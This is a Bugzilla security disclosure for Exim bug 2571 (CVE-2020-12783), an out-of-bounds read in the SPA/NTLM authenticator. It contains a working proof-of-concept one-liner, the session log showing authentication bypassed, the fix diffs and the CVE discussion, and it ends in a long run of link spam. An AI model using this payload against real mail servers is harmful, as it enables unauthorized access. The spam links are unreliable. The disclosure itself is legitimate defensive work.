Bugzilla – Bug 2571
Out-of-bound buffer read leads to Authentication Bypass in Exim SPA authentication method
Last modified: 2022-02-06 15:09:26 UTC
Hi, Exim security team. I am Orange Tsai from DEVCORE security team. We just did a little audit on authentication mechanisms, and found a out-of-bound buffer read on SPA implementation. In `spa.c`, there is no check on the user-supplied NTLM authentication message. Since NTLM is an encoded structure. An attacker can supply customized `length` and `offset` to read arbitrary memory address. For example: The SPA username/password challenge check is in `spa.c#248`. https://github.com/Exim/exim/blob/master/src/src/auths/spa.c#L249 Since we control whole the `responseptr`, we can adjust the `offset` to the address of `ntRespData` to bypass this authentication. Here is the PoC: ``` $ (echo 'EHLO test.org'; echo AUTH NTLM; echo "AAAA"; echo -ne 'o\x00r\x00a\x00n\x00g\x00e\x00\x00BDDCCCCBBGG\x70\x04\x00\x00BBCCCC\x0e\x00\x0e\x00\x0e\x00\x00\x00\x00\x00' | b ase64 -w0 ; echo ; echo QUIT) | ./exim -bh 127.0.0.1 **** SMTP testing session as if from host 127.0.0.1 **** but without any ident (RFC 1413) callback. **** This is not for real! >>> host in hosts_connection_nolog? no (option unset) >>> host in host_lookup? yes (matched "*") >>> looking up host name for 127.0.0.1 >>> IP address lookup using gethostbyaddr() >>> IP address lookup yielded "localhost.localdomain" >>> alias "localhost" >>> no IP addresses found for localhost.localdomain >>> no IP addresses found for localhost >>> 127.0.0.1 does not match any IP address for localhost.localdomain >>> host in host_reject_connection? no (option unset) >>> host in sender_unqualified_hosts? no (option unset) >>> host in recipient_unqualified_hosts? no (option unset) >>> host in helo_verify_hosts? no (option unset) >>> host in helo_try_verify_hosts? no (option unset) >>> host in helo_accept_junk_hosts? no (option unset) 220 ubuntu ESMTP Exim 4.93 Sun, 03 May 2020 10:25:45 +0800 >>> test.org in helo_lookup_domains? no (end of list) >>> host in dsn_advertise_hosts? no (option unset) >>> host in pipelining_advertise_hosts? yes (matched "*") >>> host in auth_advertise_hosts? yes (matched "*") >>> host in chunking_advertise_hosts? yes (matched "*") >>> host in tls_advertise_hosts? yes (matched "*") 250-ubuntu Hello test.org [127.0.0.1] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH NTLM 250-CHUNKING 250-STARTTLS 250-PRDR 250 HELP 334 NTLM supported 334 TlRMTVNTUAACAAAAAAAAAAAoAAABggAAEDPISlBkLXQAAAAAAAAAAAAAAAAAAAAA >>> spa authenticator server_condition: >>> $auth1 = orange >>> $1 = orange 235 Authentication succeeded 221 ubuntu closing connection ``` Our configuration: ``` $ cat /usr/exim/configure ... spa: driver = spa public_name = NTLM server_password = ${lookup{$auth1}lsearch{/etc/exim/spa_clearpass}{$value}fail} ... $ cat /etc/exim/spa_clearpass orange:orange ```
Git commit: https://git.exim.org/exim.git/commitdiff/57aa14b216432be381b6295c312065b2fd034f86 commit 57aa14b216432be381b6295c312065b2fd034f86 Author: Jeremy Harris <jgh146exb@wizmail.org> AuthorDate: Tue May 5 21:02:14 2020 +0100 Commit: Jeremy Harris <jgh146exb@wizmail.org> CommitDate: Tue May 5 21:02:14 2020 +0100 fix spa authenticator, checking client-supplied data before using it. bug 2571 ---- doc/doc-txt/ChangeLog | 5 ++ src/src/auths/auth-spa.c | 120 +++++++++++++++++++++++------------------------ src/src/auths/spa.c | 20 ++++++-- 3 files changed, 82 insertions(+), 63 deletions(-)
Hi! The patch just checks "pointer + offset" is smaller than the end of `responseptr`. However, the check condition is prone to integer overflow. An attacker can make a crash on 32-bit system.
Git commit: https://git.exim.org/exim.git/commitdiff/a04174dc2a84ae1008c23b6a7109e7fa3fb7b8b0 commit a04174dc2a84ae1008c23b6a7109e7fa3fb7b8b0 Author: Jeremy Harris <jgh146exb@wizmail.org> AuthorDate: Wed May 6 22:31:25 2020 +0100 Commit: Jeremy Harris <jgh146exb@wizmail.org> CommitDate: Wed May 6 22:31:25 2020 +0100 Rework SPA fix to avoid overflows. Bug 2571 Amends: 57aa14b216 --- src/src/auths/spa.c | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/src/src/auths/spa.c b/src/src/auths/spa.c index f83d114..ff90d33 100644 --- a/src/src/auths/spa.c +++ b/src/src/auths/spa.c @@ -141,6 +141,7 @@ SPAAuthResponse response; SPAAuthResponse *responseptr = &response; uschar msgbuf[2048]; uschar *clearpass, *s; +unsigned off; /* send a 334, MS Exchange style, and grab the client's request, unless we already have it via an initial response. */ @@ -187,10 +188,13 @@ that causes failure if the size of msgbuf is exceeded. ****/ { int i; - char * p = (CS responseptr) + IVAL(&responseptr->uUser.offset,0); + char * p; int len = SVAL(&responseptr->uUser.len,0)/2; - if (p + len*2 >= CS (responseptr+1)) + if ( (off = IVAL(&responseptr->uUser.offset,0)) >= sizeof(SPAAuthResponse) + || len >= sizeof(responseptr->buffer)/2 + || (p = (CS responseptr) + off) + len*2 >= CS (responseptr+1) + ) { DEBUG(D_auth) debug_printf("auth_spa_server(): bad uUser spec in response\n"); @@ -242,13 +246,14 @@ spa_smb_nt_encrypt(clearpass, challenge.challengeData, ntRespData); /* compare NT hash (LM may not be available) */ -s = (US responseptr) + IVAL(&responseptr->ntResponse.offset,0); -if (s + 24 >= US (responseptr+1)) +off = IVAL(&responseptr->ntResponse.offset,0); +if (off >= sizeof(SPAAuthResponse) - 24) { DEBUG(D_auth) debug_printf("auth_spa_server(): bad ntRespData spec in response\n"); return FAIL; } +s = (US responseptr) + off; if (memcmp(ntRespData, s, 24) == 0) return auth_check_serv_cond(ablock); /* success. we have a winner. */
Should this get a CVE?
Hi Andreas, I requested one from MITRE via the cveform.mitre.org (assuming this was not done yet, but have added a comment that it might have been already requested).
The CVE assigned by MITRE is CVE-2020-12783.
Now that there is a CVE, I think it deserves a fixes release for distributions.
Lacking further substansive comment on the fix, closing.
Maybe I can check it and also apply for that. Hope it is useful. http://embermanchester.uk Maybe I can check it and also apply for that. Hope it is useful http://www.compilatori.com Maybe I can check it and also apply for that. Hope it is useful http://www.wearelondonmade.com Maybe I can check it and also apply for that. Hope it is useful http://www.jopspeech.com Maybe I can check it and also apply for that. Hope it is useful http://joerg.li/ Maybe I can check it and also apply for that. Hope it is useful http://connstr.net/ Maybe I can check it and also apply for that. Hope it is useful http://www.slipstone.co.uk/ Maybe I can check it and also apply for that. Hope it is useful http://www.logoarts.co.uk/ Maybe I can check it and also apply for that. Hope it is useful http://www.acpirateradio.co.uk/ Maybe I can check it and also apply for that. Hope it is useful https://waytowhatsnext.com/ Maybe I can check it and also apply for that. Hope it is useful https://www.webb-dev.co.uk/ Maybe I can check it and also apply for that. Hope it is useful http://www.iu-bloomington.com/ Maybe I can check it and also apply for that. Hope it is useful http://www-look-4.com/ Maybe I can check it and also apply for that. Hope it is useful https://komiya-dental.com/ Maybe I can check it and also apply for that. Hope it is useful https://www.arborconsult.space/ Maybe I can check it and also apply for that. Hope it is useful http://fishingnewsletters.co.uk/ Maybe I can check it and also apply for that. Hope it is useful http://www.go-mk-websites.co.uk/ Maybe I can check it and also apply for that. Hope it is useful http://www.mconstantine.co.uk/ Maybe I can check it and also apply for that. Hope it is useful http://the-hunters.org/ Maybe I can check it and also apply for that. Hope it is useful http://rhee.tech/ Maybe I can check it and also apply for that. Hope it is useful https://texastourgear.live/ Maybe I can check it and also apply for that. Hope it is useful http://www.i-obchody.info/ Maybe I can check it and also apply for that. Hope it is useful http://www.caviastal-ruan.nl/ Maybe I can check it and also apply for that. Hope it is useful http://www.dotkraft.com/ Maybe I can check it and also apply for that. Hope it is useful Maybe I can check it and also apply for that. Hope it is useful http://www.hildyphotography.com/ Maybe I can check it and also apply for that. Hope it is useful http://illustratedmind.pl/ Maybe I can check it and also apply for that. Hope it is useful http://ammko.pl/ Maybe I can check it and also apply for that. Hope it is useful Maybe I can check it and also apply for that. http://www.jindorescue.org/ Hope it is useful Maybe I can check it and also apply for that. Hope it is useful Maybe http://www.pistoneforcongress.net/ I can check it and also apply for that. Hope it is useful Maybe I can check it and also apply http://ruirui.store/ for that. Hope it is useful Maybe I can check it and also apply for that. Hope it is useful Maybe I can http://www.foamhands.store/ check it and also apply for that. Hope it is useful